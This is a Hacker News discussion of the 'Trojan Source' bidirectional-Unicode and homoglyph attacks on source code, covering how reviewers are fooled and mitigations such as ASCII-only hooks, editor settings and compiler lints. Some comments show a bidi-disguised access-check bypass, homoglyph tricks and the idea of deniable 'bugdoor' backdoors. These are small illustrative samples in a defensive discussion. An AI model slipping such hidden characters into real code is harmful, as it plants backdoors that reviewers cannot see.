[HN Gopher] 'Trojan Source' Bug Threatens the Security of All Code
___________________________________________________________________
'Trojan Source' Bug Threatens the Security of All Code
Author : picture
Score : 442 points
Date : 2021-11-01 04:24 UTC (18 hours ago)
(HTM) web link (krebsonsecurity.com)
(TXT) w3m dump (krebsonsecurity.com)
| jwilk wrote:
| Another HN discussion:
|
| https://news.ycombinator.com/item?id=29061987
| pabs3 wrote:
| Are there any linters that detect these sorts of issues?
| marcodiego wrote:
| I thought this was a case of Source code virus[1]. With the
| current popularity of open source and services like github,
| combined with deep inter-dependencies in node.js, a virus of this
| kind could have a huge impact if unnoticed for long enough.
|
| Maybe it is the next plague waiting to happen?
|
| [1] https://en.wikipedia.org/wiki/Source_code_virus
| qwerty456127 wrote:
| Despite I'm not a native English speaker and I meant almost all
| the programs I ever wrote to be capable of processing any given
| language (and also have localized UIs in some cases), I see no
| reason for non-English strings to be allowed in source code and
| code files except some ad-hoc scripts in which hard-coding some
| text can be an optimal solution.
|
| We probably just need a git switch which would make it throw an
| error if it encounters Bidi or any weirdness like that except in
| resource files.
| mkl wrote:
| Non-English characters are quite useful in comments where
| you're explaining Unicode processing stuff, and in regexes
| working with the characters, and when you're using maths
| notation (proper symbols in comments, Greek letters for
| variables, etc.), and when you're drawing boxes in a terminal.
| I'm sure there are many more too.
| qwerty456127 wrote:
| I omitted this to keep it simple (this is why I wrote non-
| English rather than non-ASCII, I actually am a proponent of
| active usage of proper Unicode symbols like =, [?], etc, and
| also TUIs) but yes, I would prefer a rather extended English
| char-set including Greek letters, mathematical symbols,
| pseudographics etc. These can be useful and are not much
| trickier than English letters. But I would certainly like to
| see at least a warning (I would even prefer an Error
| actually) if my code file includes anything related to RTL,
| complex character composition or non-Latin letters other than
| Greek.
| samus wrote:
| Since most progamming languages are based on english, non-
| english text in string literals is almost always user-facing
| and should be put in resource files to make translation into
| additional languages easier.
|
| Identifiers and comments are a serious problem though. Many
| application domains use terms that are tricky to translate into
| english. The translations could be misleading, inappropriate or
| not unique. Sometimes they are just plain wrong or there is no
| english word that fits. All of these could cause
| misconceptions, confusion and bugs, and make reading and
| working with the code and the running system harder.
| qwerty456127 wrote:
| So you mean you can write a program and be unable to explain
| what it does in plain English?
| josephcsible wrote:
| > Many application domains use terms that are tricky to
| translate into english.
|
| What if instead of translating those terms to English, you
| just transliterated them to the Latin alphabet?
| dwheeler wrote:
| As I previously noted on a related post:
|
| Interesting paper. Note, however, that the general problem is
| already known and there are a number of pre-existing works that
| discuss it. This is typically called "underhanded code" or
| sometimes "maliciously misleading code". I'm surprised that they
| didn't use the normal term for the problem nor cite the previous
| work on it - maybe they didn't realize this was a widely-known
| problem? Previous works on underhanded code didn't discuss Bidi
| to my knowledge (though other attacks on text like this have
| exploited Bidi). Here are a number of other materials about
| underhanded code:
|
| The Obfuscated V Contest
| (http://graphics.stanford.edu/~danielh/vote/vote.html) was
| created by Daniel Horn in 2004 and is the earliest "underhanded"
| programming contest that I found. It was a contest to create
| source code that looked like it did one thing, but actually did
| another.
|
| Underhanded C Contest (http://www.underhanded-c.org/) has run in
| many years. Per its FAQ, "The Underhanded C Contest is an annual
| contest to write innocent-looking C code implementing malicious
| behavior."
|
| My PhD dissertation "Fully Countering Trusting Trust through
| Diverse Double-Compiling" discusses how to counter the "trusting
| trust" problem & includes a section about maliciously misleading
| source code. See: https://dwheeler.com/trusting-trust/
|
| The JavaScript Misdirection Contest announced the winner on
| September 27, 2015 http://misdirect.ion.land/
|
| My paper "Initial Analysis of Underhanded Source Code", (by David
| A. Wheeler, April, 2020, IDA document: D-13166), discusses
| underhanded code and the effectiveness of several potential
| countermeasures. It also includes a number of citations to other
| works on underhanded code. https://www.ida.org/research-and-
| publications/publications/a...
| kfichter wrote:
| First place winner of last year's underhanded Solidity contest
| used exactly this trick:
| https://blog.soliditylang.org/2020/12/03/solidity-underhande...
| axic wrote:
| There was related issue in 2018 regarding line endings, which
| would allow disguised some lines as code, but keeping them as
| comments: https://docs.google.com/document/d/1PZBSCBWBwd6AqWC
| gXqLnw8FN...
|
| Both of these were fixed in Solidity shortly after the bug
| reports.
|
| (P.S. I'm a member of the Solidity team)
| taviso wrote:
| It's also worth noting that if you're caught playing games like
| this, there is really no way to explain your actions that would
| avoid serious consequences.
|
| If however, you used the "bugdoor" method, you can plausibly
| deny any malicious intent and you will absolutely get away with
| it.
| ChrisMarshallNY wrote:
| Looks like avoiding dependencies and snippets is a good way to
| mitigate this.
|
| In my own work, I use almost no dependencies (aside from
| compilers and built-in APIs). Scratch that. I use a _lot_ of
| dependencies, but ones that I have written, and generally rewrite
| snippets, when I use them.
|
| Also, very little of the code I see, has comments.
|
| Like, _any_ comments; even headerdoc comments.
|
| _> Green said the good news is that the researchers conducted a
| widespread vulnerability scan, but were unable to find evidence
| that anyone was exploiting this. Yet._
|
| ... "yet" ...
|
| I know that I'm a "dependency curmudgeon," but stuff like this
| just serves to reinforce my posture.
| Cthulhu_ wrote:
| But what if this is slipped into your compiler? Your operating
| system's kernel? A top voted Stack Overflow answer? You can't
| (or it's infeasible to) check and control everything.
| _3u10 wrote:
| Yes, you're totally safe then. I've never heard of standard
| libraries having problems that affect security, certainly not
| the str* family of functions.
| ChrisMarshallNY wrote:
| Any particular reason for the nasty? I thought we didn't do
| that kind of thing, around these parts, but I'm often wrong.
| _3u10 wrote:
| The pain of having worked under these conditions of not
| using libraries, usually having to work with subpar
| libraries that were developed internally.
|
| Like oh, hey, we need a database, great, lets roll our own.
| Or the ancient version of whatever lib shipped with the OS
| that is full of bugs solved in subsequent versions.
|
| I see that you now use a lot of dependencies, and retract
| my statement.
| ChrisMarshallNY wrote:
| sigh...Why does it have to be "all or nothing"? These logical
| fallacies are pretty much a standard in these discussions.
|
| Either have 100%, ironclad security, or "Who cares? YOLO! STDs
| be damned" abandon?
|
| We do what we can to make sure what _we_ write is as good as
| possible.
|
| I lock my car door, when I get out. I know that it won't stop a
| determined thief, but it will avoid problems from the casual
| knucklehead.
| WalterBright wrote:
| Homoglyphs are a disaster and should never have been admitted
| into Unicode. There should never have been invisible semantic
| information embedded in Unicode.
| josephcsible wrote:
| Why is bidirectionality handled when text is being rendered onto
| the screen, instead of when it's being input from the keyboard?
| Why not render every single character in LTR order, and have RTL
| support instead be handled by text input fields moving the cursor
| in the opposite direction after each RTL character is typed? (I
| know it's too late to change this now. I'm asking why we didn't
| do it this way from the beginning.)
| jart wrote:
| If I understand correctly, what you're suggesting could be
| thought of as pre-rendering directionality into the memory
| layout. If we did that then it might compromise our ability to
| write an algorithm that iterates over a string of hebrew or
| arabic characters. Display is super complicated and people
| don't agree on how to do it. For example, consider the arabic
| text `wd@ 'bw tyh. If I sneak a latin A between all those
| characters to prevent the display algorithm from rearranging
| and shaping them, then that same string looks like this:
| `AwAdA@A'AbAwAtAAyAh. Those are the same characters and you can
| confirm that yourself using: for c in '`wd@
| 'bw tyh': print(unicodedata.name(c))
|
| On the other hand if you want to romanize that string as EWDTA
| AEBW TAIH then all you need is a for loop and a switch
| statement, because the memory order is always left to right. We
| can also rest assured that if someone invents a better display
| algorithm, we won't need to do any database migrations, since
| the encoding itself doesn't need to change.
| swiftcoder wrote:
| If you have a document with mixed languages, you need to be
| able to edit each language in its natural direction after the
| fact. That requires storing directionality in the document.
|
| And keep in mind that if you store RTL text backwards, as you
| propose, every algorithm now has to be able to process
| backwards text. Backwards spellcheck is a lot of extra work...
| laurowyn wrote:
| Because visual representation is separate from the underlying
| data structure. A string container doesn't have a specific
| direction, only a relative one. I.e. This character comes
| before the next and after the previous. Adding the bidi control
| code, the string indicates when the visual ordering changes in
| this relative direction system.
|
| You could absolutely design a new string container that assumes
| left to right at all times and cannot be changed, but then it's
| on the programmer to ensure that strings are copied or
| concatenated in the right direction, at the right location, and
| substrings searching becomes a minor headache. How would you
| concatenate an RTL string to a forced LTR string
| representation? You would have to work out whether the end of
| the string it LTR or RTL. If LTR, append directly. If RTL find
| the character where the direction changes and insert the string
| in there - much more expensive. Better to just append the
| string, using bidi codes where required, and let the frontend
| process the string to make the appropriate direction changes.
| Yes, you may need to search the string for the bidi code to
| know which direction you're going at the end of the string, but
| that's just a simple reverse string search for a single control
| character, and not a complex variable multi-byte search of
| inferred character directions by codepoint values.
|
| I think the issue is in the locations of which bidi codes are
| rendered. They provide an inherent untrustworthy-ness to the
| text area they're rendered in, and so should be treated as an
| exception in critical situations. I've seen the reversed exe
| file name trick used for years, and every time I ask myself why
| that's even a thing? If the OS used file headers and magic
| numbers to determine file types instead of the filename, it
| would be less of an issue.
|
| For source code, I would question the rendering of RTL text in
| a source code editor as it's an obvious issue for code safety.
| Ideally, all source code would be kept to the same origin
| language - doesn't have to be english, just consistent. Any
| non-conforming text should ideally be loaded from a resource
| rather than inline within the source code, to avoid foreign
| character contamination and allow easier identification of
| these issues. Further, source code rendering should only render
| identified safe control codes, and treat unsafe ones as raw
| binary values to be shown as such - i.e. \r and \n are safe, \b
| is unsafe, and bidi codes would also be unsafe. You could even
| go so far as to include them in the syntax highlighting, but
| that results in a dependency on syntax highlighting to show the
| semantics of the source code rather than the text alone.
| [deleted]
| malf wrote:
| Flip left and right in your idea, and you can try it out
| without learning a new language. Remember to implement word
| wrap.
| fullstackchris wrote:
| I fail to see how this can actaully be used as an exploit. As
| some commenters have said, yes, it may be a risk to some open
| source tools where there is poor due diligence for merge request
| review process - but that is almost never the case.
|
| Otherwise, if you own your own code, this obviously isn't an
| issue. (Unless, of couse, for some reason you want to program
| exploits into software at your organization :) )
|
| Heck, even GitHub already shows a warning for files that have bi-
| directional unicode...
|
| A bit of an overemotional title if you ask me.
| pietroalbini wrote:
| It's this research that prompted GitHub to show warnings, they
| didn't appear as of yesterday.
| willvarfar wrote:
| https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html has a
| nice clear example.
|
| Full Stack Chris reviews some code that he thinks says:
| if access_level != "user" { // Check if admin
|
| This may be an open source project. This may be an internal bad
| egg (a very common threat; insider jobs are actually one of the
| absolute top risks to a company). Or this code may be injected
| by an attacker who has gained access to the repo and is leaving
| backdoors that they hope to survive long after their access is
| blocked or leaving backdoors to make deployed production
| systems vulnerable. Etc.
|
| And Chris won't notice that the computer will execute:
| if access_level != "user{U+202E} {U+2066}// Check if
| admin{U+2069} {U+2066}" {
|
| This is not just an attack on compiled languages. Scripting
| languages are just as vulnerable.
| kiklion wrote:
| Sorry, still don't get it.
|
| Isn't the issue that they are using magic strings? If the
| strings were something like RoleConstants.Admin then this is
| avoided?
|
| Though I don't understand the point of the Unicode characters
| in the comment string so I must be missing something.
| tzs wrote:
| > Though I don't understand the point of the Unicode
| characters in the comment string so I must be missing
| something.
|
| There is no comment string.
| kiklion wrote:
| So after reading other parts, I get where I was mistaken
| but still believe proper coding practices of avoiding
| magic strings would avoid many of the potential issues.
|
| My mistake was thinking the initial Unicode character was
| changing the comparison string similar to a non printable
| character could. But instead it flips the ordering so
| that the comment is part of the comparison string and
| then the string is terminated.
| sethammons wrote:
| And the dev wrote test cases (negative ones too!). The test
| fails and shows admin privileges for the normal user.
| Debugging ensues. I'd hope.
| wizzwizz4 wrote:
| The test has the same kind of change. It passes, and nobody
| thinks to look at the obviously-correct code.
| throw10920 wrote:
| Or, hear me out - instead of trying to work around a legitimate
| _feature of Unicode_ , you could stop _storing your source code
| as text_ , because it _isn 't_. _Code is not text_ - it 's a tree
| of objects, and representing it as a flat sequence of text
| characters causes _many_ problems and inefficiencies (including
| this one!) that could be mitigated if you _just stored and
| manipulated it as a tree_.
|
| The only reason why text was justifiable as a storage and
| manipulation format for code in the first place was because early
| computers (probably?) couldn't handle a tree format. That excuse
| has been invalid for several decades now, as is the idea that
| "everything is plain text". Code _isn 't_ plain text - if it was,
| then you could make arbitrary edits without syntax errors, but
| you can't, because code has _structure_. Start treating it that
| way.
| shaunxcode wrote:
| Yes! This would also do away with a whole class of conflicts
| related to whitespace/formatting.
| throw10920 wrote:
| Exactly! Imagine a version control system where you get diffs
| on the AST tree, instead of the characters that make up the
| source (add an `if` and suddenly dozens of lines have
| "changed"), or the tabs/spaces flamewar evaporating
| instantly.
| scintill76 wrote:
| Also helps with naming. Only need a value once or twice? Don't
| bother trying to name it, just link it into the tree where it's
| needed.
| rocqua wrote:
| The thing about text is that it is barebones. Everyone can
| agree what the structure of text is (a stream of bytes with
| some ascii like encoding).
|
| For representing code as more than text, you will lose so much
| tools that can handle your code, it's a massive set back. Add
| to that how much effort it takes to get people onboarded on
| your new representation, and things look bleak for adoption.
|
| Finally, programmers really like looking under the hood. And
| with plain text, you know exactly what your code looks like in
| bytes.
| throw10920 wrote:
| > The thing about text is that it is barebones.
|
| That's a bug. Programming is _hard_ , and you want the best,
| most powerful tools to handle it as you can - which means
| putting effort into making _specialized_ tools instead of
| using generic ones like text editors.
|
| > For representing code as more than text, you will lose so
| much tools that can handle your code, it's a massive set
| back.
|
| _No_ tools existed without first being built, so this isn 't
| special. Rust didn't have any tools before people started
| building tools for it, for instance.
|
| Moreover, the tools that we have now that are text-specific
| are _pathetic_. You can view the first _n_ lines of a file?
| Wow, very impressive /s. More complex things like grep are
| just as realizable in a structure editor, and in order to use
| them for non-trivial stuff, you'd have to write structural
| regular expressions and implement mini-parsers _anyway_ -
| things you would get for free if you just kept code as
| structure.
|
| > Add to that how much effort it takes to get people
| onboarded on your new representation, and things look bleak
| for adoption.
|
| You're misreading my argument. I'm not saying that people
| _will_ adopt structured code (a descriptive statement), I 'm
| saying that people _should_ adopt structure code (a normative
| statement) because it 'll be much better for them.
|
| Also, you're making the assumption that onboarding is hard,
| and that compatibility layers can't exist - neither of which
| are true.
|
| > Finally, programmers really like looking under the hood.
| And with plain text, you know exactly what your code looks
| like in bytes.
|
| The average programmer probably looks at their code with a
| hex editor once in their life - this isn't really a good
| argument. Moreover, the vast majority of programmers already
| tolerate _not_ looking under the hood in dozens of different
| ways - most use VM 's like CPython/JVM/JS VMs, opaque
| frameworks like React/Angular, graphics APIs like
| OpenGL/DirectX/Vulkan, complicated editors like Visual Studio
| Code/Emacs, and far more without ever looking under the hood
| of _any_ of those - so there 's no reason to not add another
| layer (especially because you can build that layer to be easy
| to peer through) for the sake of productivity.
| ziml77 wrote:
| Would the solution to this be to render the direction switch
| control character similar to how some text editors will render 0
| bytes as a glyph with the text NUL? You could still render
| everything after it with the reversed direction, but it provides
| a visible indicator that it's been done. It might be a little
| annoying for people who use RTL languages, but it seems like the
| benefit may outweigh that.
| simmo9000 wrote:
| Here is an example, open it in an appropriate editor (vi) and you
| can see how easy it is to 'exploit' (if you can call it that?).
|
| https://github.com/nickboucher/trojan-source/blob/main/JavaS...
|
| Seams like a layer 8 problem?
| brundolf wrote:
| GitHub has already updated their UI I see
| techsolomon wrote:
| Changelog - https://github.blog/changelog/2021-10-31-warning-
| about-bidir...
| Groxx wrote:
| The Android app renders it much more suspiciously too, though
| unfortunately no warning: https://imgur.com/a/L3sNFQ8
| Semaphor wrote:
| In case there are people who (currently) don't have access to
| such an editor, here is a screenshot:
| https://i.imgur.com/2Ue2Vvd.png
| siddhesh wrote:
| You mean, like this?
|
| https://imgur.com/a/unKuOoK
|
| Snark aside, most text based editors have some giveaway or
| another. Even the GUI ones show syntax highlighting quirks that
| show that something is wrong.
|
| This is only really relevant in unicode-aware terminals,
| without syntax highlighting and when you don't get to scroll
| between characters. IOW, it's really quite hard to do.
| z29LiTp5qUC30n wrote:
| The bootstrappable community already produced a solution for
| this:
| https://github.com/oriansj/stage0/blob/master/High_level_pro...
| samus wrote:
| It's maybe worth to make a step back and take a new look at the
| underlying problem.
|
| Source code combines multiple kinds of text. There are
|
| * hierarchical structure,
|
| * mathematical and logical syntax
|
| * literals (especially insidious: text)
|
| * free text in comments and
|
| * markup in documentation
|
| These newly discovered vulnerabilities remind me of the issue of
| SQL injection, which is also caused by a confusion when combining
| these kinds of text.
|
| For SQL injection, the solution was to introduce facilities to
| explicitly combine SQL syntax and dynamic literals. Maybe we need
| something similar for code that enforces such strict separation.
| Maybe into different files or nested into a container format.
| There are already facilities for doing so (resource files,
| templating languages) but they are opt-in and don't go far enough
| to address the newly discovered problems.
|
| The cost would be that code could become more difficult to edit
| with plain-text editors.
| pdonis wrote:
| This article talks about compilers, but what about interpreted
| languages like Python or Lisp?
| metroholografix wrote:
| Emacs "fix": (setq bidi-display-reordering nil) in relevant
| modes.
| perihelions wrote:
| I forced it globally, are there reasons that's bad to do?
| (setf (default-value 'bidi-display-reordering) nil)
|
| The BIDI issue looks pretty bad in emacs-gtk: the sneaky text
| is unnoticeable in lots of modes, unless the cursor just
| happens to scroll over it.
| josephcsible wrote:
| Why did you put "fix" in quotes? Isn't that an actual fix for
| this?
| cestith wrote:
| It's more of a workaround that breaks things for people
| legitimately using RTL strings isn't it?
| zeepzeep wrote:
| The good old SexyHexe.pdf strikes again.
|
| These problems won't go away for a while, unicode is fucking
| hard. Almost every app I ever tried it had at least some problems
| with %u202E (the right to left overwrite),
| jeroenhd wrote:
| It all depends on your IDE. I've tried this, and IntelliJ and
| friends will show a little block with the text RLO for the right
| to left override or ZWS for zero with spaces for any non-standard
| character that might mess things up. (Neo)vim will show the
| unicode espace sequence instead of rendering the text as unicode
| directs it.
|
| Some compilers, notably clang, will warn you that you're using an
| "invisible character". Assuming you at least read the warnings
| your code generates (because if you don't, why not just put
| exploitable algorithms deep down ontthe software?) you'd probably
| catch the issue.
|
| Simpler programs such as the text editor that ships with GNOME
| will freak out, but I don't think most people are coding in that
| in the first place.
|
| I think this is an interesting peculiarity, but it's not a
| "threat" to "the security of all code".
| [deleted]
| aulin wrote:
| I'd say that neovim is bugged here and gedit is the one working
| properly rendering unicode as it should be
| tannhaeuser wrote:
| That Unicode with its extremely large character set would become
| a solution to any and all character encoding problems in itself
| was never the case. Usually, for a given document you'll want to
| declare the subset that's actually in use such that a particular
| font with necessarily limited coverage can be used to render it.
| That's what's available for SGML markup documents eg in an SGML
| declaration, where you can declare and construct a document
| character set from planes or arbitrary code point ranges, and an
| SGML parser can verify actual content against that subset.
| froh wrote:
| Was that capability dropped in the transition from sgml to XML?
| If so, can someone here on HN provide some pointers to the old
| discussion?
| tannhaeuser wrote:
| All discussion related to create XML as an SGML subset can be
| found on the xml-dev mailing list [1], with some earlier
| discussions and initial drafts of the SGML ERB mostly linked
| from there.
|
| The capability to declare document character sets was dropped
| along with supporting an SGML declaration altogether.
|
| [1]: http://lists.xml.org/archives/xml-dev/
| Gunax wrote:
| I am still confused. Is the text not visible?
|
| If I write some text in a comment, it should still be visibe,
| regardless of direction/bidi code, right?
| aww_dang wrote:
| I filed this domain away under 'security alarmist nonsense' years
| ago. This headline and story are prime examples of the form.
| sydthrowaway wrote:
| Seriously. State run espionage is 100x more likely
| mmastrac wrote:
| Fun story: I discovered these in the early 2000s and
| simultaneously discovered that Slashdot didn't filter these out.
| I spent an evening randomly reversing large sections of comment
| pages until they finally blocked it.
|
| I'm very, very sorry CmdrTaco.
| kingcharles wrote:
| Most web sites' comment sections will allow these. I think even
| Facebook allows tomfoolery like this.
| f[?][?][?][?]e[?][?][?][?]a[?][?][?]r[?][?][?][?]
| [?][?][?][?]t[?]h[?][?][?][?]e[?] [?]u[?][?][?][?][?]t[?][?][?]
| f[?][?]8[?]m[?][?][?][?][?][?]a[?][?][?][?]n[?][?][?]
| Cthulhu_ wrote:
| I've seen some sites / services (Discord?) filter these out,
| at least to the point where they don't escape a message's
| vertical space. I'm sure they're truncated because those
| messages are pretty big in terms of amount of bytes.
|
| And while they have valid use cases, I can't see it in e.g.
| comment sections or chat messages. Happy to have someone link
| to e.g. a Vietnamese comment section showing practical use
| though.
| Timwi wrote:
| Vietnamese Wikipedia has plenty of Talk pages with
| discussion threads.
| scatters wrote:
| Well yes, Facebook has users in Vietnam. Stacked diacritics
| are a features, not a bug.
| SavantIdiot wrote:
| This exploit requires comments.
|
| I think most code is safe.
| pweezy wrote:
| It's not the same thing, but brings to mind Ken Thomason's famous
| "Reflections on Trusting Trust" [0] from 1984.
|
| That describes a concept, over several stages, where a compiler
| can be made to change the behavior of programs it compiles in a
| difficult-to-find way.
|
| [0]:
| https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...
| kens wrote:
| This reminds me of a trick you could do on the Commodore PET in
| the 1980s, where you'd embed backspaces in your BASIC code. If
| someone looked at the code they'd see something different from
| what gets executed. Effective to keep someone from copying your
| code in class :-)
| TruthWillHurt wrote:
| Is this a real cause for concern? Simply don't copy code with
| strange unicode charecters, just like you don't copy code with
| blocks of bytecode.
| mkl wrote:
| The point of the vulnerability is that you can't necessarily
| see the strange Unicode characters.
| samus wrote:
| It's a problem in any environment where people can input
| Unicode characters. Reviewers might use tools that are not able
| to see those things.
|
| At the same time, one can't just put a blanket ban on Unicode.
| It exists for a reason. People _want_ to use their native
| languages to name identifiers, or at least to write comments.
| Restricting ourselves to ASCII again and thus forcing English
| on everybody is not a solution.
| lixtra wrote:
| > Restricting ourselves to ASCII again and thus forcing
| English on everybody is not a solution.
|
| Yet most programming languages force them to use English
| Arabic numbers.
|
| Wouldn't it be great to use Roman numerals?
|
| And then images in source code are really difficult to
| handle. Wouldn't it be nice to compile a word document with
| embedded images?
|
| I think I wouldn't mind staying with ASCII for source code,
| except for string literals (difficult enough).
| TacticalCoder wrote:
| Honest question: would it be _that_ bad to mandate and enforce
| 100% ASCII source files? Arguably every and any Unicode character
| and, well, arguably even any string of characters can (should?)
| go to a properties /resources file (properties/resources files
| which, btw, also greatly simplifies i18n/l10n).
|
| Then build/commit/test hooks could be used to enforce that source
| code files are indeed 100% ASCII.
|
| I know, I know... Some are going to lament they don't have their
| shiny Unicode symbols right in their source file. But... It looks
| like you get what you pay for.
|
| Bruce Schneier wrote it when Unicode came out btw: _" Unicode is
| too complex to ever be secure"_.
| EamonnMR wrote:
| Having readable unicode in string literals is nice.
| thereddaikon wrote:
| Seems the bigger complaint isn't lack of fancy unicode in
| comments its non-english speakers with non latin alphabets wont
| be able to comment in their native language.
|
| I'll leave it up to others to discuss how important this is or
| isn't.
| Jeff_Brown wrote:
| > Bruce Schneier wrote it when Unicode came out btw: "Unicode
| is too complex to ever be secure".
|
| It's astounding to me that there's room for such complexity in
| it. I thought it was just a lot of symbols. What other rules
| does Unicode have besides changing the order sometimes?
| ncc-erik wrote:
| The one a lot of folks know about was the soft hyphen
| (U+00AD) to bypass swear filters. I was able to use
| normalization to create XSS attacks.
| supperburg wrote:
| How dare you suggest something sensible. The mob will soon be
| knocking at your door.
| InfiniteRand wrote:
| Might be nice to have an easy tool to scan files and whitelist
| characters from specific alphabets, because in most
| international teams I think you'll have a common language for
| comments, and so I think it's unlikely that you'll need say
| European and Indic and Chinese characters in one code base.
| Except the one pain point I can see - @author annotations in
| the source code, if you have an international team you might
| end up with a variety of scripts in that field, in my mind
| that's something that can be lived without, but I can imagine
| some people being sensitive about that.
| dotancohen wrote:
| Though I comment source in English, lots of people that I work
| with comment in other languages. kvll `bryt, mymyn lshml.
| SavantIdiot wrote:
| Wouldn't simply stripping comments before doing any other
| processing solve the problem? I know there are plenty of
| programs that sprinkle code into comments, from Emacs to
| linters. Or is this obviously naive?
|
| Seems to me that if you need to put code in the comments,
| you've got a bigger problem. I know people like tab hints and
| lint overrides, but maybe it is time to focus on separation of
| concerns at a higher level?
| sfgweilr4f wrote:
| Give it a few years and unicode will probably be turing-
| complete. For reasons... likely not good ones though.
| wizzwizz4 wrote:
| Unicode rendering already requires multiple finite state
| machines.
| btbuildem wrote:
| That was my first thought -- run all your source through an
| ASCII-only filter, the problem goes away.
| iforgotpassword wrote:
| For projects like the Linux kernel this should be absolutely
| feasible. A few names in headers get mangled and lose their
| accents but that should be acceptable. Other projects... Well
| there's already a couple examples in this comment section why
| it won't be that easy.
| visarga wrote:
| Why is it called a Trojan horse instead of a Greek horse?
| panarky wrote:
| Because the Greeks transferred ownership.
| pitdicker wrote:
| Security advisory for the Rust programming language (with a nice
| explanation): https://blog.rust-
| lang.org/2021/11/01/cve-2021-42574.html
|
| Rust 1.56.1 will be released later today.
|
| > To assess the security of the ecosystem we analyzed all crate
| versions ever published on crates.io (as of 2021-10-17), and only
| 5 crates have the affected codepoints in their source code, with
| none of the occurrences being malicious.
|
| Preview of the new helpful error: https://i.imgur.com/pGpZOnr.png
| robin_reala wrote:
| That's a really impressively written error message.
| sodality2 wrote:
| That's one of Rust's selling points. For all I've used the
| rust compiler, not once have I ever not known what error it
| was pointing out: its error messages are incredibly helpful.
| Occasionally I am unsure _why_ it 's an error, but I always
| know what it's referring to and what I could do to fix it.
| Timwi wrote:
| I've had the same experience with C#. The error messages
| always state exactly what's wrong and where in the code
| it's wrong. Many of them (especially compiler _warnings_
| intended to point out syntax that is almost certainly a
| bug) also tell you how to fix it (e.g. "consider using
| 'new' keyword if hiding was intended").
| hermitdev wrote:
| Personally, I don't know why the last one ("consider
| using 'new' keyword if hiding was intended") isn't an
| error by default in C# . Not overriding the base method
| is almost always a mistake, and if it's not a mistake,
| better to be explicit about it, anyways. My $.02...
| joosters wrote:
| Their advisory is well-written and explains the problem well.
| The example code they use: if access_level !=
| "user" { // Check if admin
|
| opens up a whole can of worms though. You don't need cunning
| invisible control codes to break that line, you could just
| replace any of the letters in 'user' with a different, but
| almost-identical looking unicode symbol and you'd still have an
| exploit. Even better, this would be a completely deniable
| attack ("oops, I must have accidentally pressed alt-R while
| typing that letter" excuse) - whereas explaining away why you
| checked in some magical RTL/LTR encodings and hacked up a
| comment is impossible. Plus, it would render well in far more
| apps, terminals, command line programs, etc etc
| codesections wrote:
| > you could just replace any of the letters in 'user' with a
| different, but almost-identical looking unicode symbol and
| you'd still have an exploit.
|
| The post mentions that exploit (and Rust's already existing
| defense) in the appendix.
|
| Here are the details, as explained in a previous post:
|
| > The compiler will warn about potentially confusing
| situations involving different scripts. For example, using
| identifiers that look very similar will result in a warning.
| warning: identifier pair considered confusable between `s`
| and `s`
|
| https://blog.rust-lang.org/2021/06/17/Rust-1.53.0.html
| joosters wrote:
| _The compiler will warn about potentially confusing
| situations involving different scripts. For example, using
| identifiers that look very similar will result in a
| warning._
|
| Unfortunately, I've little experience of rust, so I don't
| have experience of that warning. It would certainly help
| catch a one-liner exploit, but wouldn't it be excessively
| noisy for code written in non-english languages?
| wongarsu wrote:
| It only warns if there actually are two identifiers that
| look similar. Even if it's not malicious it's still
| confusing and is worth renaming.
|
| But if you want to, turning off specific warnings for a
| file or block of code is really simple in rust, just add
| "#[allow(confusable_idents)]"
| estebank wrote:
| The Unicode homoglyph lint will only trigger if there are
| multiple identifiers that can look the same, it's not a
| blanket warning on anything that isn't ASCII. It's close
| to what browsers do with domain names. And you can always
| allow lints.
| lol768 wrote:
| Am I missing something here? The spacing around these
| homoglyph is _almost always_ noticeably wider than it
| should be such that I don 't understand how you could ever
| miss it in any half-decent code review.
| if access_level != "user" { // Check if admin
| if access_level != "user" { // Check if admin
|
| Come on, that looks _obviously_ off.
| nonameiguess wrote:
| If you were really reviewing that code, Rust has
| algebraic data types, and access level should be an Enum,
| not a String.
|
| But it's their example. The problem isn't with
| homoglyphs, though. It's with bidi control characters,
| which are invisible to a human but not to the compiler,
| which is how generated code can end up semantically
| different from source code, which is the actual problem
| here. What you see in code review would be the first
| line, even though that isn't actually what is in the
| source, because an editor that is bidi-aware would show
| it that way.
| steveklabnik wrote:
| > But it's their example
|
| It's the example that the researchers provided to us, to
| be clear about it.
| hug wrote:
| I think that it is possible that you are missing a fairly
| important point.
|
| ... And that point is that none of the vowels in my
| previous sentence are latin, I guess.
| mkl wrote:
| I think you missed some. I can't seem to paste your fake
| "i"s back in, but here's what I see: $
| xxd I think that it is possible that you are
| missing a fairly important point. 00000000: 4920
| 7468 d196 6e6b 2074 68d0 b074 20d1 I th..nk th..t .
| 00000010: 9674 20d1 9673 2070 6f73 73d1 9662 6cd0 .t ..s
| poss..bl. 00000020: b520 7468 d0b0 7420 796f 7520
| d0b0 7265 . th..t you ..re 00000030: 206d 6973
| 7369 6e67 20d0 b020 66d0 b0d1 missing .. f...
| 00000040: 9672 6c79 2069 6d70 6f72 7461 6e74 2070 .rly
| important p 00000050: 6f69 6e74 2e0a
| oint..
| hug wrote:
| Made you look. :)
|
| I also skipped a bunch of the "I"s.
| mkl wrote:
| Yes. What browser did you use to make the comment? I
| can't get all those characters to paste in.
| hug wrote:
| Firefox 93.0 on Windows 11. Characters copied & pasted
| from charmap.exe
|
| a: U+0430 "Cyrillic small letter a"
|
| e: U+0435 "Cyrillic small letter e"
|
| i: U+0456 "Cyrillic small letter Byelorussian-Ukranian i"
| est31 wrote:
| > warning: identifier pair considered confusable
|
| Note that the lint you mention is about _identifiers_ ,
| while "user" is a literal. The lint does not fire for
| literals. String literals have always supported non ascii
| characters since 1.0.0, and there has never been a lint for
| them, until now with the 1.56.1 release.
| estebank wrote:
| Also worth noting that the homoglyph attack _isn 't_
| linted for in literals or comments, only the bidi
| codepoints are.
| _3u10 wrote:
| This stuff has always been there consider this code:
|
| if (uid = NULL) { // Check if root
|
| And if you're using clang: if ((uid = NULL)) { // Check if
| root
|
| I'd venture that this is far more dangerous than unicode in
| strings...
|
| or how about:
|
| strcpy()
|
| or #include anything with a #DEFINE
| [deleted]
| fstrthnscnd wrote:
| > if (uid = NULL) { // Check if root
|
| That's not the same class of error, since here a programmer
| can _see_ the issue by simple inspection.
|
| > or #include anything with a #DEFINE
|
| This one perhaps is closer to the mark, although not based
| on unicode.
| _3u10 wrote:
| To me it's the same class of error which is convincing
| humans and other automated tests that your code is OK
| when it isn't.
|
| I dealt with a bug that only appeared in release builds,
| and never in debug. The offending code looked roughly
| like this: if (blah) #ifdef DEBUG
| baz(); #endif bar();
|
| The systemic problem was it was a project created by
